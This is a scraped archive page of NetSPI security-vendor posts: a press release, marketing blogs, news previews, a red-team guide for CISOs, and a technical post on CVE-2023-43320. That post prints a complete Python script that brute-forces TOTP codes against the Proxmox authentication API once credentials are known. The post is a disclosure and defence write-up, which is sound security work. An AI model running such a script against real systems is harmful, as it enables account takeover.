Month: January 2024

Back

NetSPI Achieves 42% Growth in 2023,  Increasing Efficiency and Effectiveness of Customer Security Programs

| Team NetSPI
News Press Release
Proactive security leader continues discovering and prioritizing security vulnerabilities of the highest importance to its customers, allowing them to innovate with confidence.

Minneapolis, MN – January 31, 2024 NetSPI, the proactive security solution, today announced another monumental fiscal year, achieving 42% year-over-year growth in 2023. This growth is attributed to the company’s unique ability to integrate its advanced technology, intelligent processes, and dedicated consultants, which together, contextualize the security vulnerabilities that matter most to customers. Powered by these capabilities, NetSPI identified 8,500 vulnerable entry points and more than 17,000 critical issues for its customers in 2023 alone. 

Through continued innovation and dedication to its customers, NetSPI added more than 400 new logos to its roster in 2023, a more than 30% year-over-year increase. The company also increased its internal team by 26%, which included strategically expanding in the Europe, the Middle East, and Africa (EMEA) market. 

“In today’s turbulent market, organizations are being asked to do more with less, and as a result, cybersecurity is often sacrificed. But it doesn’t have to be this way,” said Aaron Shilts, CEO of NetSPI. “Through our proactive security solutions, we’re delivering greater operational efficiency and security program effectiveness to our customers, prioritizing the vulnerabilities that truly impact the business and scaling alongside them. This allows our customers to innovate with confidence and protect the trust they’ve built with their customers.” 

Throughout the year, NetSPI unveiled strategic partnerships and innovations that further cemented the company as a leader in proactive security. Notable milestones include: 

Introducing a First-of-its-Kind AI/ML Penetration Testing Offering 

As artificial intelligence (AI) became more ingrained in business operations over the past year, NetSPI listened to customer needs and launched a first-of-its-kind AI/ML Pentesting solution. It focuses on two core components: Identifying, analyzing, and remediating vulnerabilities on machine learning (ML) systems such as Large Language Models (LLMs), and providing advice and real-world guidance to ensure security is considered from ideation to implementation.  

Launching a Cyber Protection Partnership with Chubb 

NetSPI strategically partnered with Chubb, a leading publicly traded property and casualty insurance company, to strengthen customer cyber-risk profiles via advanced attack surface management and penetration testing solutions. The collaboration provides Chubb customers with peace of mind, enabling them to identify vulnerabilities, security issues, and exposure to risk before it escalates into a claim. 

Embracing the Power of BAS and ASM 

NetSPI’s Breach and Attack Simulation (BAS) and Attack Surface Management (ASM) experienced significant momentum in 2023, with increased customer adoption and continuous development of both solutions. By leveraging insights based on intelligence gathered from thousands of pentests, combined with the company’s deep-rooted understanding of tactics, techniques and procedures (TTPs) used in the wild, NetSPI BAS and ASM are continuously updated, complimenting PTaaS to ensure full proactive security coverage.  

In 2023, the BAS platform was recognized as the “Breach and Attack Simulation Solution of the Year” by the Cybersecurity Breakthrough Awards and as the “Cutting Edge Breach & Attack Simulation” by Cyber Defense Magazine’s Top InfoSec Innovators Awards. These recognitions further prove the value of in-depth detective control validation, as well as the impact continuous testing can have on organization and the industry overall. 

Scaling the NetSPI Partner Program to New Heights 

In 2023, NetSPI achieved a 31% year-over-year increase in partner-sourced revenue and more than doubled the number of partners in its program. To meet the increased interest and nurture existing relationships, NetSPI has added four new channel experts to help lead the Partner Program, including Steve Baral, Vice President of Strategic Alliances and MSSP.  

Moving to New HQ to Accommodate Growth 

Prompted by increasing employee headcount and the need for a more collaborative workplace as the company continues to experience rapid adoption, NetSPI moved its headquarters to the Steelman Exchange building in North Loop, Minneapolis. The larger, dynamic space will support NetSPI’s growth as it enters a momentous year. 

For more information about NetSPI’s proactive security solutions, visit www.netspi.com.   

About NetSPI 

NetSPI is the proactive security solution used to discover, prioritize, and remediate security vulnerabilities of the highest importance, so businesses can protect what matters most to them. Leveraging a unique combination of advanced technology, intelligent process, and dedicated consultants, NetSPI helps security teams take a proactive approach to cybersecurity with more clarity, speed, and scale than ever before. 

NetSPI goes beyond the noise to deliver high impact results and recommendations based on business needs, so customers can protect their priorities, perform better, and innovate with confidence. In other words, NetSPI goes beyond for its customers, so they can go beyond for theirs. 

NetSPI secures the most trusted brands on Earth, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500.  

NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, X, and LinkedIn.  

NetSPI Media Contacts:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142

SHARE
Team NetSPI

Recent Posts

NetSPI Achieves Prestigious CBEST Accreditation, Solidifying Its Position as a Trusted Leader in Financial Services Security Testing
NewsPress Release
April 2, 2024

NetSPI Achieves Prestigious CBEST Accreditation, Solidifying Its Position as a Trusted Leader in Financial Services Security Testing

Expert Insights: Top 9 Breach And Attack Simulation Solutions
NewsNetSPI in the News
March 25, 2024

Expert Insights: Top 9 Breach And Attack Simulation Solutions

NetSPI Recognized as a Top USA Workplace for 2024
NewsPress Release
March 19, 2024

NetSPI Recognized as a Top USA Workplace for 2024

Back

5 Criteria for Evaluating External Attack Surface Management Vendors

| Team NetSPI
Executive Blog Attack Surface Management

As your company’s external attack surface expands and threat actors remain relentless, Attack Surface Management (ASM) solutions can help level up your proactive security measures by enabling continuous pentesting. Thoroughly vetting and comparing different ASM providers is essential to selecting one that best aligns with your business needs and overarching security goals.  

What to Look for When Evaluating External Attack Surface Management Providers  

To simplify the process of evaluating attack surface management vendors, we’ve identified five important criteria to look for when comparing different companies.  

1. Proven Reputation and Third-Party Validation 

Vendors new to the attack surface management space may not have enough experience tailoring their platform for greater business needs. Selecting a tenured vendor with a history in ASM can offer benefits such as streamlined processes, quick access to support teams, and proven methods to improve security. 

Look for attack surface management providers that have received recognition from trusted third parties such as Gartner® or Forrester. Expert analysts at these and other research and advisory firms perform a factual review of information from technology providers to recognize solutions that demonstrate innovation.

As part of this research, Forrester included NetSPI in its External Attack Surface Management Landscape Report featuring top EASM vendors, and Gartner featured NetSPI in its EASM Competitive Landscape Report.

Gartner shared the following about NetSPI in the report:

NetSPI differentiates by combining its ASM capability with its human pentesting expertise. This is achieved via the attack surface operations team, who manually test and validate the exposures found. As a result, it reduces alert fatigue and false positives, while providing customers only the critical and high exposures relative to their organization, as well as the support on how to remediate said exposures.

2. Critical Functionality 

Depending on your business needs and use cases for choosing an ASM platform, some functionalities may be more important than others. 

In The External Attack Surface Management Landscape, Q1 2023, Forrester listed several core functionalities to look for in attack surface management platforms, including:

  • External/internet-facing asset discovery 
  • Asset identification 
  • Asset and business relationship mapping 
  • Active and passive vulnerability scanning 
  • Open ports and services monitoring 
  • URL and IP range tracking 
  • Certificate monitoring 
  • Exposure/risk prioritization 
  • Custom dashboarding and reporting  

3. Screenshots and Software Demos of the Platform  

Trusted attack surface management providers have screenshots of the platform readily available so prospective customers can see what the platform and key functionalities look like firsthand.

Here’s a screenshot of the Signal Dashboard from NetSPI’s ASM platform. The screenshot shows that NetSPI ASM Operations team has reviewed 1.21k assets, discovered 285 new assets, and reviewed 232 vulnerabilities.

In addition to screenshots, having the option to take an ASM platform for a test drive through a guided demo or webinar is an important step before selecting an ASM vendor. This option can enable your team to experience the platform, ask specific questions about capabilities, and better understand feature differentiators between tools.

4. Human Analysis and Guidance  

In addition to advanced functionality, human analysis and expertise is essential to take into consideration when evaluating attack surface management companies. With human analysis, the vendor’s ASM operations team manually reviews and validates findings to reduce false positive alerts and minimize disruptions to business operations as a result. The team also helps by answering any questions that come up related to findings and providing guidance for remediation. 

One challenge businesses often face is that security or IT teams need to hire a dedicated employee to manage an ASM solution on top of investing in the solution itself, which drives up costs including hiring, training, and salary. In fact, our 2023 Offensive Security Vision Report found that one of the greatest barriers to improved offensive security is a lack of resources.  

With a user-friendly ASM platform powered by human expertise, an entire team is available to triage alerts, so you don’t need to add additional responsibilities or headcount to your team.

5. Simple Onboarding  

Some attack surface management companies require time-intensive setup and onboarding, which can take several hours of your team’s time and can push back the timeline of full platform implementation by weeks.

As you consider different ASM platforms, look for one with a streamlined or automated onboarding process, on-demand training materials, a user-friendly design, easy to digest dashboards, and human support as-needed during the onboarding process. Seamless onboarding can help ensure you start off on the right foot with an ASM vendor and accelerate time to value.

Types of Attack Surface Management Vendors 

A few different types of ASM vendors are available:

Human-Based

With this type of ASM vendor, expert human pentesters conduct penetration testing and vulnerability assessments to test the external network, typically on a quarterly basis. 

Pure Technology-Driven

Technology-driven ASM solutions involve tools or scanners that review the full attack surface (aka the assets a business has on the Internet) and use scores to prioritize and remediate impactful findings.  

Hybrid

A hybrid approach involves combining both human intuition and analysis with advanced, automated technology to more effectively identify vulnerabilities and filter prioritized alerts. 

Partnering with a hybrid ASM vendor is the most impactful option because it enables verified prioritization of results to ensure only the most relevant alerts are delivered, resulting in the best ROI on your cybersecurity investment.

Questions to Ask Attack Surface Management Vendors 

To effectively evaluate an ASM solution and select the right partner that aligns with your business requirements, develop a standardized list of questions to ask each vendor before making a decision.

Questions to consider asking include: 

  • Do you offer a human-based, technology-driven, or hybrid approach to attack surface management? 
  • How often are tests conducted? 
  • Do you offer continuous pentesting? If so, how do you approach it? 
  • How broad and up-to-date is the data?  
  • How soon do new assets appear and get recognized by the ASM tool? 
  • Do you support exposure remediation once vulnerabilities are discovered? How? 
  • Do I have access to all of my scan data if needed?  
  • What does the onboarding process look like? How much time is required of my team?  
  • What’s your process for managing and prioritizing alerts? 
  • How will you help me understand the most critical assets or vulnerabilities on my attack surface? 
  • What are the critical risk factors most likely to impact the business?  
  • Who are the potential attackers threatening my business?  
  • Which vulnerabilities are the most important to prioritize with remediation?  
  • Which exposures are threat actors most likely to exploit? 

Partner with NetSPI for the Most Comprehensive ASM Capabilities  

The right attack surface management provider can help your organization more effectively manage your attack surfaces and quickly identify and remediate vulnerabilities.
If you’re looking for an ASM platform that includes all the criteria listed above – and more – NetSPI has you covered. We created our attack surface management platform based on three essential pillars of ASM—human expertise, always-on, continuous pentesting, and risk prioritization.

Some of the benefits of selecting NetSPI as your attack surface management provider include:  

  • Simple setup and onboarding  
  • Comprehensive asset discovery  
  • Manual triaging of exposures  
  • Prioritized alerts 

Learn more about how we can improve your offensive security together by watching a demo of our ASM platform. Also take our free attack surface management tool for a test drive and search more than 800 million public records for potential attack surface exposures.

SHARE
Team NetSPI

Recent Posts

Mainframe Mania: Highlights from SHARE Orlando 2024 
Executive BlogPersonnel Development
March 26, 2024

Mainframe Mania: Highlights from SHARE Orlando 2024 

From Scanners to Strategies: How Attack Surface Management Enhances Vulnerability Scanning 
Executive BlogAttack Surface Management
March 19, 2024

From Scanners to Strategies: How Attack Surface Management Enhances Vulnerability Scanning 

NetSPI’s View on the 2023 Gartner® Competitive Landscape: External Attack Surface Management Report 
Executive BlogAttack Surface Management
March 5, 2024

NetSPI’s View on the 2023 Gartner® Competitive Landscape: External Attack Surface Management Report 

Back

Why TOTP Won’t Cut It (And What to Consider Instead)

| Cory Cline
Technical Blog Web Application Penetration Testing

This article is co-authored by Gabe Rust. 

Welcome to the Battlefield

Staring at the soft glow of a monitor, a hacker sipped coffee and watched the minutes tick by. The credentials had been obtained. The code needed to brute force the TOTP code had been written, and now it was just a matter of time. With each unsuccessful attempt, he could feel the tension in the room building. Ding. The computer screen lit up with a message of success. Satisfied, the hacker leaned back with a wry smile on his lips and thought, “I am the admin now.” 

While TOTP was once an advancement in authorizing secure access, today it’s become a dated security measure that allows persistent threat actors to find exploitable gaps. In this article we’ll explore security risks of TOTP and an alternative 2FA method to increase security.

Time-Based One-Time Password (TOTP)

Time-Based One-Time Password (TOTP) is a common two-factor authentication (2FA) mechanism used across the internet. TOTP operates by generating dynamic, time-sensitive passcodes that are typically valid for 30 seconds. The process is orchestrated during setup by exchanging a shared secret. During authentication, the secret is used in combination with the time in a cryptographic hash function to produce a secure 6-digit passcode. When a user enters a TOTP token, the server calculates the current valid token and compares them.  

This method is often used in places where 2FA is an afterthought. It’s a simple method that doesn’t require a ton of code complexity to implement. If a product arbitrarily decides to implement 2FA, TOTP is likely high on the list of supported options. However, this lack of complexity leads to a significant downfall which we will explore.

When Great Becomes…Not so Great: A Light Review of CVE-2023-43320 

Proxmox products supporting TOTP prior to version 8.0 allowed users to utilize TOTP 2FA via an authenticator application of their choice. However, due to the possibility of causing a Denial-of-Service (DoS) condition for legitimate users, TOTP authentication attempts were not rate limited.  

I made the initial discovery while reviewing the Proxmox authentication flow through Burp. Specifically, I noticed that during the 2FA portion of the authentication process, I was able to submit the same request multiple times. It stood out as interesting to me because I had recently been debating the merits of session-based vs request-based CSRF tokens with a friend. I sent the request to intruder and set it to cycle through same token 100 times. It turns out that this token was neither. Once a token was issued, it was time-based.  

But then it struck me. I had just sent 100 TOTP attempts. Would the app still let me authenticate? Why yes, it did. I started wondering about the probabilities of brute forcing TOTP. Some friends said it would take years…others guessed it could be done in days. I knew that the lack of rate limiting created a security risk: an attacker with knowledge of a valid credential pair could brute force the PIN. The only question was how long it would take. Using a rate of ten requests per second, real-world testing demonstrated successful attacks in as little as just over 12 hours. Here is an excellent article about the probabilities of brute forcing TOTP. 

Lets have a look at the code that was used to exploit this CVE:

import concurrent.futures 
import time 
import requests 
import urllib.parse 
import json 
import os 
import urllib3 
  
urllib3.disable_warnings() 
threads=25 
  
#################### REPLACE THESE VALUES ######################### 
password="KNOWN PASSWORD HERE"  
username="KNOWN USERNAME HERE" 
target_url=https://HOST:PORT 
################################################################## 
  
ticket="" 
ticket_username="" 
CSRFPreventionToken="" 
ticket_data={} 
  
auto_refresh_time = 20 # in minutes - 30 minutes before expiration 
last_refresh_time = 0 
 
tokens = []; 

for num in range(0,1000000): 
   tokens.append(str(num).zfill(6)) 
  
     
def refresh_ticket(target_url, username, password): 
   global CSRFPreventionToken 
   global ticket_username 
   global ticket_data 
   refresh_ticket_url = target_url + "/api2/extjs/access/ticket" 
   refresh_ticket_cookies = {} 
   refresh_ticket_headers = {} 
   refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"} 
   ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text) 
   ticket_data = json.loads(ticket_data_raw) 
   CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"] 
   ticket_username = ticket_data["data"]["username"] 
  
  
def attack(token): 
   global last_refresh_time 
   global auto_refresh_time 
   global target_url 
   global username 
   global password 
   global ticket_username 
   global ticket_data 
   if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ): 
       refresh_ticket(target_url, username, password) 
       last_refresh_time = int(time.time()) 
  
   url = target_url + "/api2/extjs/access/ticket" 
   cookies = {} 
   headers = {"Csrfpreventiontoken": CSRFPreventionToken} 
   stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1] 
   stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A') 
   data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)} 
   response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False) 
   if(len(response.text) > 350): 
       print(response.text) 
       os._exit(1) 
  
while(1): 
   refresh_ticket(target_url, username, password) 
   last_refresh_time = int(time.time()) 
  
   with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: 
       res = [executor.submit(attack, token) for token in tokens] 
       concurrent.futures.wait(res)

This Python script utilizes a concurrent approach with multiple threads to attempt various TOTP codes in order, repeatedly, until successful. A success state is identified by a response length longer than 350 characters. An attacker would simply need to provide a valid credential pair and target. View the details of CVE-2023-43320.

Solutions…Or the Lack Thereof

The options for using TOTP securely are limited. Proxmox fixed the issue by limiting the maximum number of 2FA attempts. Additionally, to enable TOTP, another 2FA method must be enabled as well. If too many generic 2FA fails occur, the user account is locked for one hour. If too many consecutive failed TOTP attempts occur, TOTP is disabled on the user account until they re-enable it after authenticating with another form of 2FA.  

There are two situations an account lockout could happen in. First, if a legitimate user accidentally enters the wrong TOTP key too many times, they could cause a Denial-of-Service condition for themselves. This is certainly not a great position for a user to find themselves in. However, the second situation is where real problems get uncovered. If an attacker is guessing TOTP codes, they already have valid credentials, which should be changed by the legitimate user. In this situation, using recovery codes to reset the credentials and the TOTP seed is a viable solution when TOTP is required.

So…What’s a Better 2FA Method?

We must take a step back and look at the overall workflow that our 2FA solutions are following to identify security gaps in the flow. For example, Conor Gilsenan, author of “TOTP: (way) more secure than SMS, but more annoying than Push” created this helpful workflow for TOTP.

Figure 1https://allthingsauth.com/2018/04/05/totp-way-more-secure-than-sms-but-more-annoying-than-push/ 

Observe that the authentication portion occurs strictly in step five, with Alice manually entering a One-Time-Passcode (OTP) that appears on her authenticator application into the browser. There are no safeguards proving that the number being entered was read from the authenticator application and not randomly generated. This leads to issues such as CVE-2023-43320. Some solutions have been created that require the user to take an action on their device. Such methods mitigate attackers being able to brute force PIN codes. 

Let’s look at the traditional workflow for push notifications as shown in the article “Multi-Factor Authentication (MFA/2FA) Methods” by Rublon.

Figure 2https://rublon.com/blog/2fa-authentication-methods/

In this workflow, an attacker is not naturally able to click approve or deny, but there is still a workflow flaw: user error. Users frequently click the wrong button for various reasons and if there are only two choices, the chance of clicking the wrong one is 50%. Imagine a member of your team opening their laptop at 8 am, pre-coffee, and getting a push 2FA notification. To that worker it seems natural, but in this case an attacker was waiting with a rogue access point and already obtained their credentials to access the Active Directory network.  

Finally, we can inspect a push solution that helps solve the workflow issue.

Figure 3 – NetSPI

This is the Microsoft Authenticator application. This push solution presents a two-digit number in the browser that the user must enter into the authenticator application. Now, if a user accidentally clicks yes, they must have also entered the correct number between 10 and 99. This solution does not present a serious hurdle for users.  

If an attacker obtains credentials and sends a 2FA request, the user does not have any reference for what number to enter. Technically, a user may attempt to guess a number for any variety of reasons; however, the odds of a successful breach in that particular scenario are reduced to one in 90, as opposed to 50% in other push-based implementations of 2FA. 

The Gold Standard for 2FA 

So, what is the goal for 2FA? While two-factor authentication has significantly improved account security, its current implementations have shortcomings that leave users vulnerable to persistent attackers. Several 2FA methods exist, but most of them offer only moderate protection and introduce friction into the user experience. 

For example, 2FA solutions should not be phishable. An attacker should not be able to contact a user and convince them to approve a 2FA attempt remotely. Currently, Cybersecurity and Infrastructure Security Agency (CISA) requires that all government agencies, vendors, and contractors they work with utilize phishing-resistant multifactor authentication (MFA). Currently, those solutions are FIDO/WebAuthn and PKI-based. An example of a FIDO workflow can be seen in this Descope article, “What Is FIDO2 & How Does FIDO Authentication Work?”:

Figure 4https://www.descope.com/learn/post/fido2#

In this workflow, a user must present a physical key, such as a security card or USB device, that contains a private key. This key is used to sign a challenge to authenticate to an application or service. However, this method is vulnerable to theft. An attacker should not be able to steal a device and approve a 2FA request with it themselves.  

Currently, no solution is both phish- and theft-proof. Significant innovation is necessary in this space to overcome the limitations of current 2FA solutions. However, a new generation of innovators is coming along and perhaps the solution will arrive with them.

SHARE
Cory Cline

Recent Posts

Elevating Privileges with Azure Site Recovery Services
Technical BlogCloud Penetration Testing
March 28, 2024

Elevating Privileges with Azure Site Recovery Services

Web2 Bugs in Web3 Systems
Technical BlogBlockchain Penetration Testing
March 19, 2024

Web2 Bugs in Web3 Systems

Azure Deployment Scripts: Assuming User-Assigned Managed Identities
Technical BlogCloud Penetration Testing
March 14, 2024

Azure Deployment Scripts: Assuming User-Assigned Managed Identities

Back

SC Media: Three ways enterprises can activate vulnerability prioritization

| Team NetSPI
News NetSPI in the News

NetSPI’s Vinay Anand was featured in SC Media, talking about the value of vulnerability prioritization and how organizations can take back control of their environments to address the most urgent and unpatched vulnerabilities in three easy steps. Read the preview below or view it online.

+++

Today’s security teams are witnessing a rising number of vulnerabilities, and to make matters worse, the majority of them are going unpatched — leading to critical breaches that cost organizations millions.

Unpatched vulnerabilities account for 60% of all data breaches, and according to the NIST National Vulnerability Database, vulnerability counts have steadily increased year-over-year for the past five years — showing no signs of slowing down.

The main reason for this steady incline is that organizations do not understand the basics of their attack surface. Additionally, too much of the burden has been put on CISOs. This pressure, in combination with the ongoing talent shortage facing the cybersecurity industry, has driven CISOs to say: “I’ll manage the fires when they come up. I can’t do anything to prevent them now.” However, with proper guidance and resources, that statement is simply untrue.

You can read the full article here!

SHARE
Team NetSPI

Recent Posts

NetSPI Achieves Prestigious CBEST Accreditation, Solidifying Its Position as a Trusted Leader in Financial Services Security Testing
NewsPress Release
April 2, 2024

NetSPI Achieves Prestigious CBEST Accreditation, Solidifying Its Position as a Trusted Leader in Financial Services Security Testing

Expert Insights: Top 9 Breach And Attack Simulation Solutions
NewsNetSPI in the News
March 25, 2024

Expert Insights: Top 9 Breach And Attack Simulation Solutions

NetSPI Recognized as a Top USA Workplace for 2024
NewsPress Release
March 19, 2024

NetSPI Recognized as a Top USA Workplace for 2024

Back

What is the CISO Experience in a Red Team Exercise?

| Tim MalcomVetter
Executive Blog Red Teaming

You’re about to have your first Red Team experience, or maybe your first one in the CISO seat of your organization. Maybe it’s just been a little while since your last one and you are curious how this one will go, what the Red Team will find, how your Blue Team will handle it, and what the longer tail takeaways post-engagement will be like.  

But before you begin, it’s important to consider: What am I not thinking about? Are we ready? How can I prepare for this?

What if I Have Specific Objectives for Red Teaming?

If you haven’t already, make sure you’ve discussed your objectives with your Red Team partners to ensure alignment with what you’re hoping to learn and focus on. This conversation will often center around matching Red Team objectives with the maturity of the security program and your Blue Team to get the most benefit from a Red Team exercise, because this definitely should not be a one-size-fits-all exercise. For example, at NetSPI, we tailor match the Tactics, Techniques, and Procedures (TTPs) we use to your currently known capabilities and gaps. Our goal is to help you grow your program in a meaningful and material way, even if resources are constrained and growth is gradual.

How Much Do I Tell My Team when Engaging Red Team Testing?

It’s most common for a Red Team exercise to be an extremely limited knowledge event. Who you provide advanced notice to is up to you. Our advice: less is more if you want to know how truly prepared your security program is.  

If you do these all the time, you may want to tell your team that a Red Team exercise will happen in the future but remain vague—no specific dates. This has a “Secret Shopper” effect, just like a retail clerk who is unsure if their customer is an actual customer, or a plant sent from corporate headquarters to evaluate the store. The foreknowledge that a secret shopper may arrive at any time can have a positive psychological effect, bringing out the best performance of the team. Likewise, your Blue Team may become naturally more vigilant simply because they know a Red Team may come anytime.

What if I have an MSSP or MDR Provider?

Since most MSSP or MDR provider relationships are focused solely on the ability to detect and respond to credible threats, it is best to NOT advise them in advance that the Red Team exercise is happening. However, post-exercise, it is critical that you properly read-in your provider so that they can collaborate with you on a path to improve detection and response coverage. NetSPI, specifically, loves to partner with MSSPs and MDR Providers, because they are your Blue Team on the front lines. Our objective isn’t to make your provider look bad; our objective is to prepare your organization for the eventuality of a real incident.

Should I Have Expectations on How Successful the Red Team Exercise Will Be? 

It’s probably best to set expectations that while your Blue Team will bring some friction to the Red Team, it will feel like the Red Team managed to get ahead and reach objectives too easily. This isn’t always the case, of course, and we love to have our best tradecraft get shut down by our customers!  

But since our Red Team constantly focuses on what works, what doesn’t, what security controls provide friction against which TTPs, etc., we are constantly improving. If our Red Team is successful, it doesn’t mean that the threat actors most likely to land in your environment will automatically have equal success.  

Threat groups tend to cluster around a smaller set of TTPs than our Red Team because they apply them at Internet scale across many organizations. If the techniques fail and a Blue Team contains them, they don’t care. There isn’t enough friction to change TTPs often if they still work on the next victim. Our goal is to be the best [simulated] threat actor we can be for you. This is a subtle, but important difference. 

Now all of that isn’t to say this is easy for our Red Team. By far the hardest part of our job is getting the initial access foothold into your organization. We don’t have magic 0-day exploits to walk right in. We have drudgery ahead of us: scouring your entire perimeter, learning about your business using Open-Source Intelligence (OSINT), social engineering our way in (if that’s in scope for your engagement) … essentially leaving no stone unturned.  

We prefer to do it this way, when possible, because once our Red Team lands inside your organization, it will “feel natural” to incident responders who eventually (hopefully) will see something unusual that they chase to its origin. But that said: do not over-index on this step. If your goal is to absolutely find a way from the outside into your organization, you probably should do an External Network Penetration Test instead.  

What you’re ultimately buying in a Red Team exercise is the detection and response cat-and-mouse game that helps you evaluate your readiness for a breach. You don’t get that benefit from us until we land inside your organization. Because neither you nor we have unlimited surplus budget, we will want to time box our efforts looking for the “natural” ingress point, and when we hit that point, we will want to switch to an “assumed breach” scenario where you seed us access. We can even do it this way from the start to save time and money.

What Happens After a Red Team Exercise? 

Besides the debrief meeting and handing you deliverables, what’s next for a CISO after a Red Team exercise? In most cases, there will be significant security engineering and process overhaul project work. Unlike a pentest, where a finding can be quite small and tactical, such as applying a patch, fixing permissions, changing a password, or updating a line of code, findings coming out of Red Team exercises are typically wide-reaching and systemic. Some may require projects that span more than a year to complete. It may be good for you to brief your CFO, CEO, and Board of Directors about the exercise in advance that you will likely come asking for a budget increase to cover control gaps. We can certainly help you with messaging there as well! Reach out anytime. 

What about Follow-Up Testing? 

While the Red Team may likely find and exploit vulnerabilities in your internal environment, they won’t exhaustively search for all related instances of that vulnerability. Red Teaming is a depth-first search: chaining vulnerabilities, detection gaps, process flaws, and misplaced human trust together to reach an objective.  

Penetration Testing, on the other hand, is a breadth-first search: locating all instances and permutations of all possible vulnerabilities. For example, if the Red Team finds a single instance of SQL injection on an internal web application, exploiting that to gain additional objectives or access, the best next step is to perform a top-to-bottom penetration test on that web application, to ensure nothing else was missed that the Red Team didn’t have time to find, or was trying to be too quiet to test. 

How Often Should I Plan for Red Team Testing?  

This is entirely up to you, of course, but here are some things for you to consider:  

  • How much has changed with your controls since you completed the first Red Team exercise?
    If not much, don’t expect a wildly different experience in the Red Team’s ability to reach objectives—but the exercise can still be meaningful to give your Blue Team another chance to train and become more prepared for an actual event. You can also ask us to avoid certain things or modify the path towards objectives to vary from your prior experience. 
  • How large and segmented is your business?
    If you have a lot of M&A, subsidiaries, disparate geographic locations, etc., you may benefit from intentionally scoping another Red Team exercise to land in another part of your organization sooner than later. These “satellite” organizations often provide less detection and response friction to adversaries looking for a path to pivot into the corporate mothership.
  • What cadence are you trying to establish?
    It may be beneficial from a budgeting perspective to plan for a semi-annual or annual Red Team exercise to set a solid precedent with your CFO, CEO, and Board of Directors that this is a meaningful recurring part of your security program. When combined with the ideas above, the experiences each time will definitely vary. 

How Can I Tell if a Red Team Exercise is Successful? 

As the CISO, you will appreciate that a successful Red Team exercise has almost nothing to do with whether the Red Team reached an objective.  

The Red Team could reach an objective but highlight serious gaps in the process that you can quickly fix with existing controls or help make the business case for a security budget extension. Or they could be contained by your Blue Team without any new technical learnings, yet the confidence the Blue Team gains from containing the Red Team might be precisely what is needed for your security program. 

At the end of the day, “success” is largely a product of clearly defining the goals you have for the engagement and tying the results back to the identification and reduction of risk, improving your cybersecurity program, and protecting your organization. No two exercises are exactly alike! 

Whether you’re starting your first Red Team exercise, or you’re looking for an outside perspective on your overall security, NetSPI is here to help. Access our Red Team data sheet below to get started.

SHARE
Tim MalcomVetter

Recent Posts

Mainframe Mania: Highlights from SHARE Orlando 2024 
Executive BlogPersonnel Development
March 26, 2024

Mainframe Mania: Highlights from SHARE Orlando 2024 

From Scanners to Strategies: How Attack Surface Management Enhances Vulnerability Scanning 
Executive BlogAttack Surface Management
March 19, 2024

From Scanners to Strategies: How Attack Surface Management Enhances Vulnerability Scanning 

NetSPI’s View on the 2023 Gartner® Competitive Landscape: External Attack Surface Management Report 
Executive BlogAttack Surface Management
March 5, 2024

NetSPI’s View on the 2023 Gartner® Competitive Landscape: External Attack Surface Management Report 

Back

Information Week: The Rise of Deepfakes and What They Mean for Security

| Team NetSPI
News NetSPI in the News

On January 4, 2024, NetSPI’s Field CISO Nabil Hannan contributed an article to Information Week on the rise of deepfakes, how they’re used, and how they affect the security landscape. Read the preview below or view the full story online.

+++

Deepfakes are increasingly popular as a modern technology phenomenon, gaining popularity primarily because the source code and software to create them have become readily available to the public.

At the same time, recent data indicates general awareness around deepfakes continues to increase, especially as high-profile figures like Mark Zuckerberg are mimicked through the technology. However, while deepfakes are not so new anymore, questions remain around the practical applications of using a deepfake as an attack vector, how easy it is to perform this kind of attack, and what they mean for our security.

You can read the full article at https://www.informationweek.com/machine-learning-ai/the-rise-of-deepfakes-and-what-they-mean-for-security.

SHARE
Team NetSPI

Recent Posts

NetSPI Achieves Prestigious CBEST Accreditation, Solidifying Its Position as a Trusted Leader in Financial Services Security Testing
NewsPress Release
April 2, 2024

NetSPI Achieves Prestigious CBEST Accreditation, Solidifying Its Position as a Trusted Leader in Financial Services Security Testing

Expert Insights: Top 9 Breach And Attack Simulation Solutions
NewsNetSPI in the News
March 25, 2024

Expert Insights: Top 9 Breach And Attack Simulation Solutions

NetSPI Recognized as a Top USA Workplace for 2024
NewsPress Release
March 19, 2024

NetSPI Recognized as a Top USA Workplace for 2024

Back

[Q&A] Chubb Cyber Insurance Clients Activate Proactive Security with NetSPI

| Team NetSPI
Executive Blog Partners

In case you missed it, Chubb, one of the leading publicly traded property and casualty insurance companies, announced an innovative collaboration with NetSPI to strengthen client cyber-risk profiles via enhanced attack surface management and penetration testing solutions.

What started as a penetration testing program for Chubb has evolved into a partnership in which NetSPI will help Chubb cyber insurance clients proactively assess and mitigate risks that could lead to claims. Core benefits Chubb clients receive as a part of the collaboration include:

  • Preferred pricing on Attack Surface Management (ASM), Breach and Attack
    Simulation (BAS), and Penetration Testing as a Service (PTaaS). Plus, select clients will be able to access the ASM platform at no cost.
  • The resources and expertise to stay resilient throughout the lifecycle of their policy which will, in turn, improve and inform the underwriting process for renewals.
  • Access to 280+ expert penetration testers across the globe for tailored proactive security solutions to support any size business across all industries.

Want to delve deeper into what this partnership means for security teams and how it will impact the future of the cyber insurance industry? Hear first-hand from Chubb in this video, and read the Q&A below, featuring Chubb Cyber Intelligence Officer Craig Guiliano and NetSPI CEO Aaron Shilts.

What is proactive security? And why must it be prioritized across the greater security community?

